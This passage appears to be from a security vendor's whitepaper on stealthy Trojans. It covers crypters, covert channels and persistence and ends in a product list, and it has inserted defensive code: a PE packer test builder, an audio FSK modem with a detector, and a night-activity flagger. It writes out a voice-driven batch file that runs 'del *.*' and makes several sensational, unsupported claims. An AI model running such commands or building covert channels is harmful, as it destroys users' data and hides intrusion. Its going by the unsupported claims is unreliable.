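    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # PE header right after
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table, vaddr, rawptr = b"", 0x1000, 0x400
    for name, vsize, rawsize, chars in sections:
        table += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), vsize, vaddr,
                             rawsize, rawptr if rawsize else 0, 0, 0, 0, 0, chars)
        vaddr += (vsize + 0xFFF) & ~0xFFF
        rawptr += rawsize
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table

# Section layouts as stock UPX writes them, the same with names edited, and as a linker writes them.
UPX_SAMPLE = build_pe([("UPX0", 0x20000, 0, 0xE0000080),
                       ("UPX1", 0x9000, 0x8800, 0xE0000040),
                       (".rsrc", 0x1000, 0x600, 0xC0000040)])
RENAMED_SAMPLE = build_pe([(".text", 0x20000, 0, 0xE0000080),
                           (".data", 0x9000, 0x8800, 0xE0000040),
                           (".rsrc", 0x1000, 0x600, 0xC0000040)])
PLAIN_SAMPLE = build_pe([(".text", 0x8000, 0x8000, 0x60000020),
                         (".data", 0x1000, 0x600, 0xC0000040),
                         (".rsrc", 0x800, 0x800, 0x40000040)])

if __name__ == "__main__":
    for label, image in ("upx", UPX_SAMPLE), ("renamed", RENAMED_SAMPLE), ("plain", PLAIN_SAMPLE):
        print(label, packer_tells(image) or "no packer tells")
```

A hit is a lead, not a verdict: a legitimate vendor's packed installer trips the same checks. An unmodified UPX stub is reversed with upx -d; a modified one has to be unpacked by running it under a debugger and dumping the process once the stub has finished.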
Morphine:
Similar to UPX, this software wraps a shell around a program and encrypts its contents, evading virus and
Trojan scanners that look for a signature sequence of bytes, at least until the scanner learns to recognize
the crypter's own decryption stub, which is a signature in its own right.
Undetectables:
There are many freely available Trojan horse programs on the Internet. Some describe themselves as "remote
administration tools"; others unashamedly describe themselves as Trojan horses. Several groups now offer
custom versions of their Trojans with advanced functionality, or recompiled or altered in such a way as to
elude the scrutiny of all anti-virus and Trojan detection systems. These "tweaked" versions are available
for a fee ranging from 200 to more than 20,000 U.S. dollars. The altered versions are one of a kind and
their signatures differ from the freely available versions, making them "undetectable" to all known
anti-Trojan programs. Furthermore, since they are usually deployed on only one victim system, they are very
unlikely ever to come to the attention of the security community and so remain effective indefinitely.
There is no data on the popularity of these "undetectables", but one can assume that many individuals or
groups would be willing to shell out a more than modest sum to maintain a permanent spy in a competitor's
computer systems.
E.T. Phone Home
E.T. = Early Trojan. If the method of initial entry has only a small deliverable capacity or payload, the
start vector takes the form of a worm-type infection. In some cases we have found evidence of a compressed
cavity virus similar in form and function to the CAK worm but lacking the self-replication of a true worm.
Replication is not the goal of the stealthy Trojan; this is consistent with a design goal of stealth over
replication, since replication would hurt system performance, revealing its presence, or trip the
reproduction heuristics of an intelligent virus checker. It does share some properties with the CAK worm,
such as the use of UPX, the popular Ultimate Packer for eXecutables, to shrink the payload. In addition it
uses the cavity technique, writing itself into the unused padding inside an existing executable so that the
host's size does not change, to remain hidden while awaiting a timed activation.
Hacker Communications in general.
Clearly the Trojan Masters rely on communications to and from their victims' systems. The variety of
communications used on today's systems is mind-boggling, and the Trojan Masters are, of course, adept at
using and misusing almost every form of machine communication imaginable. As usual, "your mileage may vary".
Telephone techniques:
Telephone dial-up:
Turn off the modem speaker, wait for a quiet time, call out, log on and communicate.
Anonymous pager:
Similar to the above, but call a pager number and send a short text message with a call-back number or IP
address.
Call back:
Turn off the modem speaker, pick up the line before the first ring within a certain time range, and
communicate.
Fax in and out:
Use the fax data protocol and the fax software (which is installed by default) to send and receive data by
misusing the fax protocol.
UDP over telephone:
UDP, the User Datagram Protocol, is a connectionless transport over IP: datagrams carry no session state,
the source address is trivially forged, and broadcast datagrams are not forwarded by routers, which makes a
sender on the local segment hard to trace. It is carried equally well over any link that carries IP, a
dial-up line included. This technique is widely used by a hacker group calling themselves MSN (MicroSoft
Network), although our research indicates that it seems to be limited to Windows 98 machines. Newer Trojans
use a utility called Covertn to perform clandestine file transfers using UDP broadcast.
ICMP:
A low-level control protocol, useful because firewalls commonly let it through and nobody inspects it,
dismissing it as "router talk"; the payload of an echo request and its reply can carry arbitrary data.
TCP/IP:
The most common routable protocol on the Internet.
Wireless Communications, Wi-Fi:
Wireless computer communications form an attractive category for hackers. Wireless technology has added a
new phrase to the security lexicon, "war-driving": the practice of driving around neighborhoods looking for
an open wireless network. The 802.11b protocol in particular has been targeted by the hacker community. In
addition to war-driving there has been a good deal of activity in the field of linear amplifiers, illegal
radio-frequency boosters for the 2.4 gigahertz band used by 802.11 systems, which let the hackers tap into
these networks from a much greater range.
Bluetooth
Bluetooth is a short-range wireless protocol often used for communications between PCs and cell phones. A
device left in discoverable mode answers any inquiry within radio range, and pairing in early
implementations rested on short, often fixed PINs, so an unattended discoverable device is easy to connect
to. (Note: Bluetooth's link-level security between nodes is also very poor.)
Radio Keyboards & mice:
These common devices often use Bluetooth chips and protocols, and so open a vulnerable communications
channel for hackers (see the Bluetooth section). In addition, various vendors use other proprietary
frequencies and formats (27 MHz and 2.4 GHz radio, typically without encryption) that allow a properly
configured Trojan program to receive commands and data by wireless transmission.
Infra-red communications, IrDA:
Infra-red communications, available on most laptops, printers and some low-cost input devices, use
invisible infra-red light to carry a signal between machines. Most laptops automatically configure and
accept data from these ports, and we have seen this used quite often by clandestine Trojans. The IrDA
protocol is installed by default on most laptops and is configured to allow file and printer sharing with
little or no security. In rare cases it is possible to use an ordinary light-emitting diode (LED) for this
form of communication, albeit one-way, provided the Trojaned computer's motherboard gives direct control of
a front-panel LED.
Wireless access to non-wireless ports.
This technique is rarely seen even in the most sophisticated Trojan suites, but it is worthy of note because
it demonstrates the high level of programming skill brought to bear on the task of establishing
connections. The technique involves the USB (Universal Serial Bus) connection available on most systems.
The USB port normally connects to a variety of devices, such as printers, mice, keyboards, microphones, USB
modems and many others, and is designed to configure itself when it "sees" such a device, using the
Plug-and-Play (PnP) capabilities of Windows 98 and later. By transmitting radio or electromagnetic waves of
sufficient magnitude in the vicinity of these ports it is reportedly possible to induce enough current in
the wires that run to them to fool the computer into recognizing a device as if it were physically
connected. This is rather difficult to achieve: it requires the hackers to possess sophisticated
transmitters, it only works on USB ports whose wires from the external connector to the motherboard are
unshielded, and to use such a channel the Trojan must already have privileged access to the victim's system
in order to install a purpose-built USB driver.
Audio Communications
The tendency for what was once an add-on card to be incorporated into the computer's motherboard has
continued in a predictable pattern for many years. The latest add-on cards to be bundled into main-board
functionality are the audio sound system and, to a lesser extent, the AGP/PCI video card, often referred to
as the VGA card. The once common Sound Blaster card is becoming a thing of the past, replaced by
motherboard-mounted equivalents built into the so-called "support chips" supplied to motherboard
manufacturers by a small group of large chip makers such as Intel and VIA.
These chip manufacturers tout their combination of hardware, software and firmware (see the EEPROM section)
as a "standard system", as it may be. It should be noted, however, that before such systems became
"standard" they were considered "new and different", and had consumers then made decisions in line with the
implications of today's marketing, these odd-balls would have been shunned in favor of the "standard" Sound
Blaster card. Marketing has such freedom of expression, don't you think? Nevertheless, the reality is that
"standards" are created by the manufacturer's forceful leverage of its huge marketing power, its massive
influence on board design standards and quite restrictive long-term trade agreements, which have killed the
add-on sound-card business and created a duopoly of "standard" sound systems, namely Intel's AC'97 and
VIA's built-in 5.1 sound system.
The existence of a relatively small number of programmable chips able to perform complex operations on
sound, especially since the software for them (including software development kits, SDKs) is freely
available from the chip manufacturers' technical sites, has led to a remarkably sophisticated array of
shared tools, shareware and freeware applications and third-party application software, all of which has
contributed to the hacker arsenal of audio-based techniques. The Trojan uses these techniques to expand its
communication capabilities and, in some cases, to assist in gaining access to a computer's systems.
Soft Modem communications
The ability to manipulate a computer's sound system leads to some rather esoteric uses of audio. Using the
audio chip's driver software it is possible to control, in minute detail, the processing and production of
audio signals: the sound chips are equipped with programmable-gain amplifiers, programmable waveform
synthesizers and programmable filters of every kind. Using these programmable features the Trojan Masters
have devised numerous methods of illicit communication.
The techniques vary considerably, but the common thread is to generate a modulation (frequency-shift
keying, FSK, in the simplest case) that differs from what standard modem communications use, and so, being
"proprietary", is not decoded by anything that happens to be listening. This audio signal may be routed to
the telephone line through any modem on the computer, especially a "soft modem", so called because its
normal modem signal is generated by software through the motherboard's audio chips. The capabilities of
these chips grow by leaps and bounds, and so too do the illicit communication capabilities. Note, though,
that an audio codec sampling at 48 kHz cannot produce the frequencies DSL uses, so a channel built this way
is limited to voice-band modem rates, not broadband ones, whatever the machine's own DSL link can do.
Hacking with Audio Communications
A fundamental requirement for a hacker program is, of course, to spread its influence to other systems by
any and all means possible. In certain circumstances this leads to the use of audio as a communications
tool. Imagine a situation where a Trojan has gained a foothold on a laptop computer that is rarely, if ever,
connected to the Internet. This is not normally a tenable situation for the bandwidth-hungry Trojan Masters.
However, in certain situations it is possible to bring such a system under control and into communication,
albeit slow communication, with the Trojan Masters. The trick is to use the built-in microphone and
speakers of the laptop to achieve local, bi-directional communication with a desktop that is online and
also compromised. This is achieved by modifications to the audio drivers and sound synthesizer software
shipped with the computer. Many modes are possible and are routinely tried and tested by the Trojan
software. These include:
• Low-frequency phase modulation of the left/right speaker differential
• High-frequency phase or frequency modulation of a noise (“hiss”) signal
• High-frequency amplitude modulation of a noise (“hiss”) signal
• Carrier-less frequency modulation of a legitimate audio signal (“music”)
• Carrier-less amplitude or speaker-differential modulation of a legitimate audio signal
• Differential echo or “flanging” modulation of a legitimate audio signal
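The tone-pair channel that the Soft Modem section and the tone-based modes above both describe, as an added example that is not code from this document or from any soft modem or Trojan. It modulates bytes as continuous-phase binary FSK, passes them through a noisy audio channel and recovers them with a Goertzel detector, and it adds the defender-side check the text does not give: a narrowband-energy ratio that separates a signalling tone from hiss or music. The sample rate, baud rate, mark/space frequencies and noise level are assumptions chosen so that each tone lands on an exact analysis bin; a real covert channel would pick its own values. Standard library only, so it runs offline.

```python
"""Binary FSK over an audio sample stream, plus a narrowband detector.

Added example, not code from the original document. All numeric
parameters below are assumptions chosen for clarity.
"""
import math
import random

SAMPLE_RATE = 8000       # Hz, assumed (telephone-quality audio)
BAUD = 100               # symbols per second, assumed
F_MARK = 1200.0          # Hz, tone for a 1 bit, assumed
F_SPACE = 2200.0         # Hz, tone for a 0 bit, assumed
SAMPLES_PER_BIT = SAMPLE_RATE // BAUD   # 80 samples per symbol


def bytes_to_bits(data):
    """MSB-first bit list for a byte string."""
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]


def bits_to_bytes(bits):
    """Inverse of bytes_to_bits; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def fsk_modulate(data, amplitude=0.5):
    """Continuous-phase FSK: one tone per bit, with the phase carried
    across symbol boundaries so there are no audible clicks."""
    samples = []
    phase = 0.0
    for bit in bytes_to_bits(data):
        step = 2 * math.pi * (F_MARK if bit else F_SPACE) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            samples.append(amplitude * math.sin(phase))
            phase = (phase + step) % (2 * math.pi)
    return samples


def goertzel_power(block, freq):
    """Squared magnitude of one DFT bin of `block` (Goertzel algorithm)."""
    coeff = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s1 = s2 = 0.0
    for x in block:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def fsk_demodulate(samples, n_bits):
    """Non-coherent detection: compare the energy at the two tones per
    symbol. Assumes symbol timing is known (stream starts on a bit edge)."""
    bits = []
    for i in range(n_bits):
        block = samples[i * SAMPLES_PER_BIT:(i + 1) * SAMPLES_PER_BIT]
        mark = goertzel_power(block, F_MARK)
        space = goertzel_power(block, F_SPACE)
        bits.append(1 if mark > space else 0)
    return bits


def add_noise(samples, sigma, seed=1):
    """Additive white Gaussian noise with a fixed seed (deterministic demo)."""
    rng = random.Random(seed)
    return [s + rng.gauss(0.0, sigma) for s in samples]


def roundtrip(payload, noise_sigma=0.3):
    """Modulate, pass through a noisy 'line', demodulate."""
    audio = add_noise(fsk_modulate(payload), noise_sigma)
    return bits_to_bytes(fsk_demodulate(audio, len(payload) * 8))


def narrowband_ratio(block, freqs=(F_MARK, F_SPACE)):
    """Defender-side check: fraction of a block's energy sitting in the
    strongest candidate tone. By Parseval the Goertzel powers over all N
    bins sum to N * sum(x^2); a real-valued pure tone puts half of that in
    its positive-frequency bin, hence the factor 2. Near 1.0 means a clean
    tone; speech, music and hiss score far lower."""
    energy = sum(x * x for x in block)
    if energy == 0.0:
        return 0.0
    peak = max(goertzel_power(block, f) for f in freqs)
    return 2 * peak / (len(block) * energy)


if __name__ == "__main__":
    message = b"covert"
    print("recovered:", roundtrip(message) == message)
```

The detector is deliberately simple: it looks only at the two tones it knows about. A practitioner hunting for an unknown channel would sweep every bin of each block and alarm on any bin holding a large, steady share of the energy during what should be silence or broadband content, and would run that sweep on the microphone input as well as the speaker output.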
Irrespective of the means of audio communication used, the methodology of implementation follows a
general pattern:
1. Use the compromised connected system to gain foothold access to the off-line laptop.
2. Adjust communications for optimum performance.
3. Prepare to exploit any faster communication method when available.
4. Issue error and/or upgrade messages to encourage the user to go online for data.
5. Make use of floppy, Zip and other hand-carried data transports.
Most important of the steps above is the first, “foothold,” step. A foothold can be achieved in hundreds of
ways, some of which are discussed elsewhere in this document. Worthy of note are the following very
specialized techniques involving audio:
• Insert an audio communications payload into a single-replication boot sector virus in the hope that sooner
  or later a desktop-created floppy, Zip disk or CD will be inserted into the laptop (a reasonable assumption).
• Perform a Plug and Play spoof of a storage device, i.e. a USB-connected RAM drive, and route it through any
  Bluetooth device (such as a remote mouse or keyboard).
• Insert an executable penetration hack into a printer buffer in the hope that the laptop will be connected to
  a shared printer.
• Modulate a desktop-machine-controlled LED to simulate an IrDA Plug and Play printer device.
This may include downloading and installing modifications to the computer’s audio control software that
enable so-called “advanced features” such as microphone gain boost, high-frequency kernel-mode modulation
techniques and speaker-to-microphone translation (using the PC’s speakers in reverse to perform the
function of a microphone). The possibilities are endless. The reader may note that these techniques can
also be used in conjunction with several other clever tricks such as voice recognition and voice command.
Voice Command and Voice Recognition
Since its first introduction in Windows Me (Millennium), Voice Command (VC) and Voice Recognition (VR)
have maintained rather low profiles in the Windows coterie of functionality. VR and VC have not yet really
taken their places as valid methods of interacting with a computer, though their potential is enormous. The
project has been plagued by problems throughout its many years of development and is still not considered
“ready for prime time.”
VR and VC have also suffered from less than enthusiastic support from many third-party software
manufacturers. This lack of support is not without cause. VR and its subset cousin VC have both been
crippled by rather lackluster accuracy, due to the sheer difficulty of a task which must take into account
accents, mannerisms and the immense variability inherent in human speech. VR was released long before
the computing power needed to cope with this task was commonly available. These days the power is there,
but inaccuracy persists, due in part to the immense variability in the quality of both the sound cards and
the microphones commonly installed on today’s computers.
Nevertheless, both Voice Command and, to a lesser degree, Voice Recognition are incorporated in many of
our computers and may yet someday supplant the keyboard and mouse as the primary method of interacting
with them. In the meantime, Voice Command and, to a lesser extent, Voice Recognition have their uses for
the Trojan Masters.
Voice Command
The functionality of voice command is simple: tell the computer what you want it to do and it does it! From
the security perspective this opens a veritable Pandora’s box of possibilities, and, as could be expected of
the Trojan Masters, all of these possibilities have been fully exploited. When a command is executed, it is
executed under the credentials of the currently logged-on user; if that user is a member of the
“Administrators” group, then the commands wield considerable power.
What if you could “tell” the computer to do the following (letters spoken one at a time where shown):
    Open Notepad
    NEW
    D-e-l-*-.-*
    Save As
    C-:-\-h-a-k-.-b-a-t
    CLOSE
    RUN
    C-:-\-h-a-k
This sequence writes a batch file containing del *.* and runs it. A bare wildcard del asks “Are you sure
(Y/N)?”, and that prompt can be answered by voice as well; it then deletes every ordinary file in the directory
the batch file runs from. Hidden and system files survive a plain del, so the machine is not necessarily
rendered unbootable, but the user’s data in that directory is gone, and exactly the same mechanism can run
any other command the logged-on user is permitted to run.
User Names and Permissions
The Standard Trojan is a Built-in Feature of Your System
The words BUILT-IN, STANDARD, GENERIC, SYSTEM, etc. are utilized extensively to disguise and dismiss
suspicion of all manner of Trojan antics. STANDARD is a favorite of the add-on communications ports
which begin sprouting up all over your PCI bus and co-installing on top of anything you may have that
can in any way talk to anything. This includes a few things that don’t talk at all. No, not everything with
these monikers is bad. According to the rules, it has to be a legitimate and used name or convention, but by
the time you have five GENERIC Serial Port Controllers, three STANDARD Serial Port Enumerators and
between five and ten GENERIC Serial Port Adaptors, with their associated WAN Mini-Ports and two or three
co-installers buried behind them, you can bet that something is amiss.
What better name to hide behind than these brown-bag, plain-packaged, innocuous “standard stuff,” “nothing
to worry about” names?
When it comes to BUILT-IN, we are most likely talking about users again. Microsoft provides us with the
legitimate pattern and established precedent for various BUILT-IN accounts such as BUILT-IN GUEST,
BUILT-IN ADMINISTRATOR and BUILT-IN NT AUTHORITY. These accounts are supposed to exist, but they
should not be messing with your security settings while you are asleep! Equally out of place are characters
like “Remote Desktop Assistant Microsoft 133ee1276” (XP only) and all manner of disabled, enabled or just
faking-a-disability GUEST accounts, whether or not they are disarmingly prefixed by the BUILT-IN pro-name.
Other variants are legitimate names such as Backup Operator, Power User and Recovery Operator, which are
not normally populated unless an administrator specifically adds to them and yet suddenly appear equipped
and ready for their STANDARD BUILT-IN duty. To be precise, the Backup Operators and Power Users groups
exist on every Windows NT, 2000 and XP installation; what should not appear without an administrator’s
action are members in them. Backup Operators membership in particular carries the backup and restore
privileges, which allow reading and overwriting any file regardless of its permissions, so an unexpected
member there is an administrator in all but name. Below these sits a whole class of lower-level users imbued
with hidden super powers.
Fear the user introducing themselves as the GENERIC, STANDARD, BUILT-IN \ (INSERT YOUR OWN LOCAL
WORKGROUP NAME) \ BACKUP OPERATOR. He may look like the janitor, but under that mild-mannered
exterior resides Phineas Phreak, empowered with Domain Administrator privileges and an NT Root Authority
certificate signed by Bill Gates himself!
Certificates of Authority and Digital Signature Certificates
Power to install any software, and to override or rewrite the security rules designed to prevent such things,
is relatively easy to get these days. Digital signature files are sitting in a folder on your machine, or at least
they should be; if they are not, this may be a bad sign. Many variants of the Trojan swipe these certificates on
sight, thus ensuring you will never have full authority over your machine. Other variants rather boldly take
the time to order a fresh, updated set of certificates from Microsoft in your name.
Overriding “super certificates,” which identify remote login users as trusted, or certify the authenticity of an
installation program or the legitimacy of a complete overhaul of all your security settings, generally requires
presenting authority certificates and software signature certificates which are difficult to fake or reproduce.
However, as is often the case, the Trojan typically bypasses all of the strong areas of effective security
design and performs a flanking maneuver, avoiding the problem entirely: “No, I don’t need to break no
crypto, that’s hard! I just steal the keys!” Your domain controller has overriding authority keys that you, as
Administrator, cannot ordinarily bar. Code-signing and identity verification certificates, such as the trust
certificates issued by VeriSign Inc. to its corporate clients (which include Microsoft), are securely issued only
to the signing company. Yet in January 2001 VeriSign issued two code-signing certificates in the name
“Microsoft Corporation” to a person posing as a Microsoft employee (Microsoft Security Bulletin MS01-017).
Until the corrective update is applied, any software signed with those certificates passes Authenticode checks
as though it came from Microsoft.
Despite relatively quick action by VeriSign and Microsoft to address this gaffe, their solution was programmed
for disaster from the outset. The bogus certificates carried no CRL distribution point, so Windows could not
discover their revocation automatically; the fix required casual computer users to first hear about the
problem and then obtain and install an update that carries a revocation list covering the two certificates and a
handler that consults it.
Few casual users have ever taken the trouble to diligently plod through the hundreds of security patches and
hot fixes issued by Microsoft each year. In fact I would go so far as to say that few professionals, myself
included, have that kind of time. I, like many others, take a risk until the next Service Pack or Security Rollup
package is released.
Persistence of control - Hanging On
One key secret to the modern Trojan’s current success, and part of the certainty of this class of software’s
dominance in the future, is the Trojan Masters’ elegant implementation of another assumed set of rules:
RULE: Never allow a system, once taken over, to escape control. Implement multiple copies of the starter
code and put them in places they don’t know exist.
RULE: Anticipate all forms of aggression against our software, and build multiple levels of counter and
defense whilst remaining plausibly normal, defending against anything less than an exposure incident.
RULE: On first sign of an exposure incident: Nuke! Erase! Destroy! Leave no evidence whatsoever! But do it
sneakily and quietly, with legitimate-looking error messages wherever possible.
RULE: If a particular system is getting more than one brief but nuked exposure, run a full DNA/RNA analysis
and consider changing maintenance and updates mode to null.
RULE: If maintenance and updates fail to null the user and exposures continue, consider implementing a
period of no boot.
RULE: When nulling a user with a history of exposure, always attempt a true clean and secure simulation for
a calming period before re-attempting takeover.
RULE: If DNA indicates not nullable and persistent exposures continue, consider either magic status or a
temporary “true clean.”
RULE: If magic status is refused, or post-“true clean” maintenance status is attacked, or the software is
exposed again, offer perm status with no nuke.
RULE: If perm status with exposures is persistent, cycle through no boot, true clean and perm mode,
increasing the no-boot period each cycle until perm no-boot status is reached.
RULE: If exposure of the secret vault occurs, follow the previous rules the first time only.
RULE: If the secret vault is exposed a second time, call in a manager.
CMOS RAM
Complementary Metal Oxide Semiconductor Random Access Memory is Silicon Valley’s way of referring to
the small memory that does not forget even when the power is really, honestly turned all the way off. It
achieves this trick by the simple expedient of a little battery which kicks in if ever we do get the power off
and keeps this little puppy alive and active. (Strictly, CMOS RAM is ordinary volatile memory; it is the
battery, not the chip, that makes it persistent, which is why a flat battery or a shorted clear-CMOS jumper
resets it.) This one never goes to sleep and is not frozen either. Initially designed to hold must-have but
changeable data such as the real-time date and time, designers have increased its capacity and functionality
over the years, adding hard drive parameters, boot configuration options, RAM chip timing data, sometimes
rather low-security boot-up passwords, and a host of other “stick around” but remain-changeable data.
EEPROM
This is a very technical acronym for a very simple concept: it refers to a type of memory that does not forget
even with the power off and does not even need a battery to keep its data. This seemingly ideal form of
memory is used sparingly in computers since it is both very slow and comparatively expensive. Nevertheless,
it is finding its way into places you would never suspect. Due to its remarkable ability to be reprogrammed
while in place, it gives the manufacturer an opportunity to upgrade a product in the field, and a second
chance to fix a design or manufacturing snafu without an expensive recall. No small wonder these little guys
are everywhere. They are the perfect place to hide a small client control program that cannot be found or
erased by any normal means. Naturally, we are hyper-aware of these guys and we look for them assiduously;
even now we are discovering new places where they can hang out and provide a toehold entry point for a
Trojan takeover or a retake operation. Most recently, we were astonished to find an EEPROM broadcasting
from inside the battery of a laptop computer! Almost every modern laptop battery pack contains a small
controller with an EEPROM (the Smart Battery System, read by the host over the SMBus) holding
information such as a unique serial number, date of manufacture, model number, name and place of
manufacture (see RNA section), number of recharge cycles, battery wear condition, battery chemistry,
capacity information, etc.
Even more difficult to locate are the EEPROMs that store configuration information here and there
throughout the computer itself. Hey, if I were a board designer and could buy myself job-saving insurance
against design snafus, I would definitely stock up on these babies. Oh, how much the lead design engineer on
the ill-fated early Pentium chip (the one that couldn’t divide properly) must have wished for a field
programmable upgrade. In recent years these chips have found their way into most areas of the computer,
and so, in rough order of size, here is the not yet complete list of places to hide stuff that persists:
• VGA graphics card BIOS
• ACPI BIOS extension ROM
• System board BIOS (boot ROM BIOS or flash ROM)
• Ethernet card configuration BIOS
• Ethernet card on-board net boot ROM
• Intel Itanium network boot ROM
• Modem configuration BIOS
• PCI chip configuration BIOS (north bridge)
• PCI chip configuration BIOS (south bridge)
• Microprocessor microcode update storage (the update itself lives in the system BIOS image; the processor
  holds it only until power-off and the BIOS reloads it at every boot)
• ATAPI CD-ROM flash ROM BIOS
• ATAPI CD-R and/or CD-RW flash ROM
• ATAPI DVD upgradable flash ROM BIOS (with a special mention of the programmable DVD region-code
  setting, which the drive allows to be changed only a handful of times before it locks)
• and finally our newly discovered rechargeable battery statistics chip
The long-winded acronym, for those who just have to know: Electrically Erasable Programmable Read-Only
Memory.
Error Messages & Other Time Gainers
“BAD DISK”
The file NTLDR is missing or corrupt, please replace this file and reboot the system.
The file NTOSKERNEL.DLL is missing or corrupt, please replace this file and reboot the system.
The file HAL.DLL is missing or corrupt, please replace this file and reboot the system.
The file NTDLL.DLL is missing or corrupt, please replace this file and reboot the system.
(Note that the genuine Windows kernel file is NTOSKRNL.EXE; a message naming NTOSKERNEL.DLL is itself
a tell that the message did not come from Windows.)
(Stonewalling and Obfuscations)
The system is operating in 16-bit video mode, as part of a test by Microsoft Inc. This software has been
optimized for performance in 16-bit video mode.
As part of a test, Information Interchange Service is now installed and configured with a personal web server
demonstration suite of programs. An FTP server is configured to support this testing effort.
The file NTDLL.DLL is missing or corrupt, please replace this file and reboot the system.
The boot.ini file is corrupt, booting from C:\WINNT
The system is shutting down by the authority of NT AUTHORITY\SYSTEM
The system is shutting down in 60 seconds:
SORRY YOU ARE TOAST, WITHOUT ADMISSION OF RESPONSIBILITY
ALL OUT WAR, YOU ARE GOING DOWN!
AND STAY DOWN!
Other noted Trojan functionality
Unattended Time
The software can interrogate the time of day from the local computer and make immediate assumptions as
to when the system would most likely be unattended and therefore able to risk taking advantage of greater
portions of the available Internet bandwidth and performing highly “visible” operations. These include
restarting the computer (occasionally necessary in order to replace an active operating system file with a
usurped version), otherwise severely affecting the normal performance of the system, or producing obvious
indications of uncalled-for activity such as large-scale hard disk access. These more visible operations are
scheduled for late at night initially; thereafter a log is kept of the actual usage patterns of that particular
system and the schedule is adjusted accordingly. (See also Physical Location Determination.)
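The defender’s counterpart to the usage-pattern scheduling just described, as an added example that is not code from this document: learn the hours in which the user is normally present from input events, then flag heavy disk or network activity, or a reboot, in hours where the user has never been seen. The log format and the log lines are constructed for the demo (an assumption); in practice they would be fed from the host’s own event source.

```python
"""Flag loud activity in hours the user is never present.

Added example, not code from the original document. The log format and
SAMPLE_LOG below are constructed for the demo (assumption).
"""
import re
from datetime import datetime

# Constructed sample log: ISO timestamp, event kind, optional size in MB.
SAMPLE_LOG = """\
2003-02-10T08:55:00 input keyboard
2003-02-10T12:10:00 disk_io 35MB
2003-02-10T17:30:00 input mouse
2003-02-11T09:02:00 input keyboard
2003-02-11T13:15:00 net_io 12MB
2003-02-11T18:05:00 input keyboard
2003-02-12T02:14:00 net_io 640MB
2003-02-12T02:31:00 disk_io 2300MB
2003-02-12T03:05:00 reboot unexpected
2003-02-12T09:00:00 input keyboard
"""

LINE_RE = re.compile(r"^(\S+) (\w+)(?: (\S+))?$")
BULK_EVENTS = {"disk_io", "net_io"}


def parse_log(text):
    """Yield (timestamp, event, megabytes); megabytes is 0 when absent.
    Lines that do not parse are skipped rather than aborting the scan."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        try:
            ts = datetime.fromisoformat(m.group(1))
        except ValueError:
            continue
        detail = m.group(3) or ""
        mb = int(detail[:-2]) if detail.endswith("MB") else 0
        yield ts, m.group(2), mb


def presence_profile(events):
    """Hours of the day (0-23) in which any user input was ever observed."""
    return {ts.hour for ts, event, _ in events if event == "input"}


def flag_unattended_activity(events, profile, min_mb=100):
    """Return events loud enough to notice that fall in hours the user has
    never been present: bulk I/O of at least min_mb, or any reboot."""
    flagged = []
    for ts, event, mb in events:
        if ts.hour in profile:
            continue
        if (event in BULK_EVENTS and mb >= min_mb) or event == "reboot":
            flagged.append((ts, event, mb))
    return flagged


def analyze(text, min_mb=100):
    """Build the profile and the flag list from one log text."""
    events = list(parse_log(text))
    return flag_unattended_activity(events, presence_profile(events), min_mb)


if __name__ == "__main__":
    for ts, event, mb in analyze(SAMPLE_LOG):
        print(ts.isoformat(), event, f"{mb}MB" if mb else "")
```

An hour-of-day profile built from three days is noisy: in deployment the profile should accumulate over weeks, distinguish weekdays from weekends, and carry a short allow-list of scheduled jobs (backups, defragmentation) so that legitimate night-time I/O does not drown the alerts.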
Physical Location Determination
Why the software goes to such lengths to find out the physical location of the attacked system is, as yet,
unclear to us, save for the obvious verification that the attacked system’s physical location jibes with its
self-reported location, as yet another guard against hacker entrapment. Nevertheless, the system determines
its physical location in a number of different ways:
By picking off the local address entered into various well-known application programs such as Outlook,
United Parcel Service tracking systems, etc.
By tapping into a user’s Internet session and recognizing prompts or meta tags such as “Address.” In these
days of online ordering and online help, hardly a week goes by before some web site makes my address a
“required field” for some such service or information.
Phone Number Lookup
Even easier than picking out addresses: the phone number is recorded by local software all over the place.
Applications, the modem dialer and the system fax all record the full telephone number in unencrypted
form. An Internet lookup reveals the city; the yellow pages will narrow it down to the neighborhood.
LoudWolf Solutions
Products Overview 1 of 4
The following pages contain a brief description of some of our products. A more detailed description of the
products and the threats they address can be found on the page referenced after each description:
Sentinel
This product is a hardware and software PC add-on. It is a monitoring and action-decision system. It
constantly monitors a number of sensors and, if the sensors flag a problem, the Sentinel takes action based
on a set of fixed, read-only rules. The actions it takes range from stopping access to an interface (serial,
network) to the complete shutdown of the machine. [For further information see page: ]
Sentinel Platinum
This product uses the Sentinel product as a base, but adds the advanced functionality of monitoring wireless
interfaces. This is deemed an advanced product because the wireless environment is less secure and more
open to attack. [For further information see page: ]
Sentinel Sharp
This is an add-on product to the Sentinel and Hot ROD products. It addresses the problem of administering
advanced security monitoring systems: administration cannot be carried out via any operating-system
software, as that lends itself to hacking and thus negates the whole security implementation. Sentinel Sharp
is a small touch-sensitive 4”x3” black and white LCD unit that controls the Sentinel system via a serial
interface. It has no means of control other than its touch-sensitive screen and is thus not hackable from the
host. [For further information see page: ]
Sentinel Avenger
Sentinel Avenger is based on the Sentinel product. It allows trusted processes to be monitored; if a threat is
perceived, a set of fixed, read-only rules determines the associated actions, which range from stopping
access to an interface (serial, network) to the complete shutdown of the machine. [For further information
see page: ]
Sentinel Avenger Upgrade
Subscription service product for Sentinel Avenger, i.e. to add more trusted-process definitions, in much the
same way virus definitions are made available on subscription. [For further information see page: ]
Products Overview 2 of 4
Hewlett Packard Sentinel
This is a special project to meet a requirement from HP, and consists of a hardware and software secure
authenticating system. HP requires a way of trusting particular machines. It is based on some of the
underlying ideas of the ‘SuperKey’ technology; however, it has a set of keys that are accessed by numerical
